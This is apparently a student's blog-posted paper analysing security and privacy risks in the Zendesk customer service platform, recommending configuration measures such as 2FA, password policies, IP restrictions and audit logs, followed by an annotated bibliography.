Security

Zendesk Risk Analysis and Recommendations

Abstract

This paper will provide an overview of CSM (Customer Service Management) applications, focusing primarily on their security and susceptibility to risks; it will concentrate on Zendesk, a software suite that I just implemented at my organization. As an IT manager, one must carefully select which CSM their organization would utilize by performing several of the same risk assessments and evaluations discussed in this course. As cloud-based help centers, all-in-one customer communication platforms, and enhanced data analytics and sales metrics engines are quickly becoming the norm for businesses in modern times. Too often, the risks associated with using such a service go unnoticed. This paper intends to provide the reader with an in-depth risk analysis of Zendesk and the methods of minimizing, mitigating, or eliminating any identified threats.

A CSM, or customer service management application, enables an organization to interact with customers on various communication channels, including live chat, email, social media, and VoIP. A CSM can provide employees a more advanced method of sending files, creating internal tickets, setting meetings, and accessing information. For many organizations, a CSM is at the heart of the company, developed and maintained to facilitate all internal and external telecommunications. Securing a CSM is vital to the continued operation of a business regarding the privacy, integrity, and availability of their and their customer’s data.

How should one strengthen the security of Zendesk, the service many use to manage customer interactions, build relations, increase sales, and allow employees to create internal tickets? Zendesk can also be run as an online help center (Guide) and loaded with self-help articles, ranging from topics such as product management, business practices, customer service, and IT, for example. Before one dives into the security settings of Zendesk, there are a few things they should first address with the initial setup of the system. The first thing one should do is play around with the Sandbox feature, which is a test environment for the future build. By using Sandbox, one can create the entire CSM (Zendesk, n.d.). Much like a virtual machine, one can perform penetration/malware testing and ensure that everything is working before they go live.

Guide, Zendesk’s help center, is an outstanding method to provide self-help to both customers and employees (Zendesk, n.d.). Guide can be used to provide a means for employees to submit internal tickets, thus eliminating their necessity to have a Zendesk Support account (this change can save a company hundreds of dollars a month). Also, through the use of the uploaded articles, both employees and customers can retrieve answers to their problems by searching or even have suggested articles pop-up as they write a ticket. Due to some of the posts’ sensitivity, one should always reinforce the protection measures so that customers could not access Guide.

The first thing to understand is how Guide’s individual post settings can be customized; one can limit them to only agents or managers, add them to a separate category, edit who manages them, and restrict their viewing only signed-in users. Guide offers extensive spam controls and filters, as well as shows who has used it recently through the use of Explore, Zendesk’s data and analytic tool, which is also useful for all other Zendesk modules (chat, email) (Zendesk, n.d.). Like how Zendesk handles emails, one can fine-tune user profiles, restricting or providing access to specific IP addresses or individuals. In many instances of Guide, the option to display unsafe content should be turned off (which can potentially prevent malicious code from being submitted) and also require users to sign-in to have access.

Many who start using Chat, Zendesk’s live chat feature, install it on only one of their websites; in the future, installing it to the rest in stages is recommended to solve problems and refine settings before performing a full rollout. Securing Chat is similar to the other Zendesk modules. One can require users to sign-in (through Facebook, Google, or by creating an account), limit access to specific countries or IPs, and disable file uploads. If a company is similar to most, they will have a seemingly endless number of emails to connect; during this process, they will need to ensure to enter the correct email, as well as verify the connection was successful. For most Gmail accounts, the verification process should be simple; however, one can quickly run into errors with aliases, ranging from SPF to DNS errors.

Zendesk, at the moment, does not support Gmail aliases, although the connection can ‘somewhat’ be created. Before connecting an organization’s emails, go through all email settings, and run a security check. Adding/updating account recovery options, turning on two-step verification, and creating a strong password are all recommended. Often, one will have to go into, for example, their Gmail account to add the Zendesk forwarding address. Note: one can also create ‘.zendesk’ emails to replace those which do not verify correctly (and they are free) (Verge, n.d.).

Next, Zendesk administrators will want to understand how routing emails can increase security with the use of triggers; by routing individual departments, brands, or emails with parameters like the subject line, one can make sure that emails (like their superior’s banking info) are sent to the correct manager and not ‘Linda’ from customer service. Creating triggers that auto-inform users of a submitted ticket (for security and accountability) and developing automations to send alerts based on the organization or department’s SLAs (service-level agreements) is highly recommended. Generally, organizations use a long list of triggers and various automations to route internal/external tickets from their brands and numerous websites; it takes time, but the results will speak for themselves (Young, 2020).

Much like Windows, users have permissions and roles, which either grant or disable access to specific ticket views, groups, and forms. Following the same sysadmin protocols of only granting users the minimal access they need is an excellent idea. Administrators have the ability to make account changes, so assign admin privileges sparingly. Now, let us discuss the security settings within Zendesk. Through the security page, one can control access to the mobile app and enable automatic credit card numbers’ automatic redaction. The redaction feature is an excellent way to protect customer data; however, it works a little too efficiently. Redaction will replace credit card numbers with blank spaces before an agent can even enter the data; while this is secure, it can cause headaches.

Within the admin section, one can, and should, turn on Zendesk authentication, which will require staff members to sign in with an email and password. Zendesk offers the ability to control the character minimum of Zendesk login passwords through the use of password levels (Zendesk, n.d.). If one does not desire to get too in-depth with customization, they can use the ‘high’ setting; this requires passwords to contain at least six characters, include letters in mixed cases and numbers, expire after ninety days, and only allow ten attempts before a lockout, thus adding protection against brute-force attacks. (Avares, (n.d.). To add extra security, one can create a custom password level as well, which is thoroughly recommended.

Next, Zendesk administrators will see an external authentication setting on the staff member page; this allows employees to sign in using external services. Depending on the company’s size and the level of sensitivity of their data, one may want to disable this feature; they should also allow and encourage their users to login with Google set up with SSO (single sign-on). The above settings apply to both internal and end-users, each with a separate page to make end-users have more complicated protection measures or vice versa.

Administrators of Zendesk domains should, under the advanced tab in admin settings, enable email notifications; they will then receive a notification if any parameters are changed within Zendesk, which is a necessity for providing a top-down view of the protection of the system at all times. One can also turn on 2FA (two-factor authentication) for staff members, as well as see which employees have not set it up yet. In the majority of instances, 2FA should be turned on and set with a period of inactivity greater than eight hours; if this is enabled, the user’s session will expire after the time limit is reached. By adding IP address restrictions, one can restrict Zendesk usage for a specific address range, allowing further intrusion deterrence (Zendesk, 2020).

Finally, most administrator’s favorite tool to use in Zendesk is its built-in audit/changelog. As a Zendesk account owner, there can also be a few administrators who occasionally make changes; having too many hands in the bowl, or cooks in the kitchen, can lead to disastrous complications if they are unknown. Scanning the audit log at least daily can ensure no changes were made that the account owner did not approve or know about. Zendesk, or any CSM, can open up a wide range of additional communication tools, abilities, and channels, for both internal and external users. Like any application or software, the method by which it is built can lead to success or failure, depending on the research and actions one takes in increasing information asset protection (Zendesk, n.d.).

Regarding privacy in Zendesk, their policies impact both the Zendesk Developer Portal and Zendesk Marketplace, where many third-party applications exist; it does not, however, protect third-party websites. Zendesk routinely collects account and registration information, submission data, social media widget information, data provided by third parties, and utilizes cookies. Zendesk uses the data it collects to perform its obligations under its service agreements and maintain and improve its services. Customer information is often shared with third-party service providers and for marketing purposes. Zendesk participates in several privacy laws and regulations, such as the European Commission (Art. 46 GDPR), EU-U.S. Privacy Shield Framework, and the Swiss-U.S. Privacy Shield Framework.

When it comes to exercising data rights within Zendesk, there are several routes one can follow. Ensuring that customer data is correct is vital to the task and removing any information that is not required is an excellent recommendation. Frequent auditing of what data is entered into Zendesk should be performed. Both Zendesk agents and end-users can access, update, and delete their personal information. If Zendesk’s services are no longer needed, deactivating each user profile can be done quickly. Users can also request that Zendesk stops using their personal information and opt-out of communications from Zendesk.

Zendesk is a fantastic tool to assist in an organization’s communication, both internally and with their customers. As any CSM poses challenges with security and privacy due to the vast amount of information gathered, it is vital to understand Zendesk’s many applications and services in their entirety. Only by knowing what needs defending can one effectively reduce their level of risk. Zendesk is a rising star in the field of complete accountability and transparency of employee and customer interactions; however, trusting an organization with both the company and their customer’s data can be intimidating. Researching how a CSM accomplishes their often-sizable goals of securing one’s personal information should always be performed, as well as conducting a risk assessment into their operations, past legal issues, and future expansions.

Annotated Bibliography

Wheeler, E. (2011). Security risk management: Building an information security risk management program from the ground up. Waltham, MA: Syngress.

In this book, the fundamental steps in building an information security risk program will provide the foundation of the risk analysis of Zendesk and assist in recommendations for minimizing and mitigating any found risks. As the risk identification process can be challenging and time-consuming, this paper will utilize the book’s teachings to limit scope creep by focusing efforts on the primary risks of Zendesk’s many products.

Zendesk. (n.d.). Customer service software for the best customer experiences. Retrieved September 30, 2020, from https://www.zendesk.com/support/?variant=231.

Zendesk Support’s home page features several articles and documents on Zendesk’s products, as well as an overview of what they offer; by using this information, one can ascertain how the ticketing system, live chat, social messaging, voice chat, help center, AI, forums, and the agent workspace works. The only way to fully understand the risks of a product and increase its security is to thoroughly learn the product and its many variations and connected services.

Zendesk. (n.d.). Secure Customer Service with Zendesk Security. Retrieved September 30, 2020, from https://www.zendesk.com/product/zendesk-security/.

Zendesk provides a general overview of their security practices on this page, focusing on how they protect their data, audit their systems, and ensure confidence in their handling of sensitive data. Furthermore, the article covers their compliance with certifications and memberships, NDA resources, and cloud application, product, and human resources security. By utilizing this article, one can obtain how Zendesk secures their data, what risks are present, and how to strengthen their products.

Young, A. (2020, September 25). Security best practices. Retrieved September 30, 2020, from https://support.zendesk.com/hc/en-us/articles/203663716-Security-best-practices.

As Zendesk includes several different products and systems, knowing what Zendesk recommends for security best practices is the first step in analyzing their risks and adapting each layer of protection to the specific situation. The article covers password security and recommended password policies, administrator guidelines, auditing suggestions, single sign-on authentication, IP restrictions, custom API tips, and safe credit card and sensitive information handling. The abovementioned lessons will provide an in-depth view of Zendesk’s protective measures.

Zendesk. (2020, June 2). Privacy and Data Protection. Retrieved September 30, 2020, from https://www.zendesk.com/company/privacy-and-data-protection/.

As Zendesk deals primarily with handling an organization’s customer data, their privacy and data protection rules and regulations are vital in ensuring trust. This article covers how Zendesk manages, hosts, and accesses their (and their customer’s) data, how data is stored, who owns the data at various points in its life cycle, and includes several articles on data processing agreements, binding corporate rules, and privacy shields. This article’s information will assist in analyzing what Zendesk does correctly and what needs additional work regarding their susceptibility to risk.

NCSC. (n.d.). Zendesk security review. Retrieved September 30, 2020, from https://www.ncsc.gov.uk/collection/saas-security/product-evaluations/zendesk.

This article from the National Cyber Security Centre shares a security review of Zendesk; in this article, the encryption that Zendesk uses as a SaaS is covered and an analysis of several of their business practices. This article will provide a basis to build on when it comes to answering several of the questions present about Zendesk’s cloud services. The report includes data regarding Zendesk’s use of HTTPS, TLS, APIs, 2FA, and their SIEM system.

Zendesk. (n.d.). Advanced security addon additional features. Retrieved September 30, 2020, from https://www.zendesk.com/th/company/advanced-security-add-additional-features/.

As Zendesk offers an extensive library of products, deciphering the legal requirements of each can be challenging; thankfully, this website covers how they ensure their compliance with legal requirements. Included in the information are Zendesk’s legal policies and procedures for customers, partners, purchasers, and suppliers. Additionally, risk management, security policies, information security organization, asset management, and human resources are discussed.

Nadeau, C. (n.d.). Complying with Privacy and Data Protection Law in Zendesk products. Retrieved September 30, 2020, from https://support.zendesk.com/hc/en-us/articles/360022366953-Complying-with-Privacy-and-Data-Protection-Law-in-Zendesk-products.

This article expands on Zendesk’s compliance with privacy and data protection laws on each of their numerous products. Included in the report is Zendesk’s compliance with Zendesk Support, Insights, Guide, Chat, Chat accounts, Talk, Explore, Connect, Sell, and Sunshine. Furthermore, the article defines their definition of personal data, soft delete, hard delete, permanent delete, and a scrub. Armed with this article’s information, one can build their knowledge of Zendesk’s many tools and explain risk analysis in their words.

Avares M, Ladd V. (n.d.).  Converging Data Privacy and Security. ISSA Journal. 2020;18(8):26-30. Retrieved October 1, 2020, from https://search-ebscohost-com.ezproxy.bellevue.edu/login.aspx?direct=true&db=tsh&AN=144915588&site=eds-live.

            This journal touches on the past, current, and future states of data privacy and protection and how they impact risk. By including detailed steps for assessing risk, this journal will assist in the risk analysis of Zendesk’s products and create recommendations for mitigating or minimizing risk. Finally, the structured approach for bridging security and data privacy will be covered, offering a clear path to this paper’s goals.

Verge, D. (n.d.). It’s 10 o’clock, do you know where your data is? Using data mapping to comply with privacy and security requirements. New Hampshire Business Review. 2020;42(5):22-23. Retrieved October 1, 2020, from https://search-ebscohost-com.ezproxy.bellevue.edu/login.aspx?direct=true&db=b9h&AN=142312240&site=eds-live.

            This article explores data mapping and how it is used in complying with privacy and security requirements. As the science and policies on data security and privacy seem to change every day, this report will provide the basis of requirements placed on organizations that deal with customer information. As Zendesk stores and processes a vast amount of personal information, including credit card numbers, addresses, emails, and phone numbers, one needs to map this data and locate possible weak points in their defenses, thus minimizing their risk.

Categories: Security

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s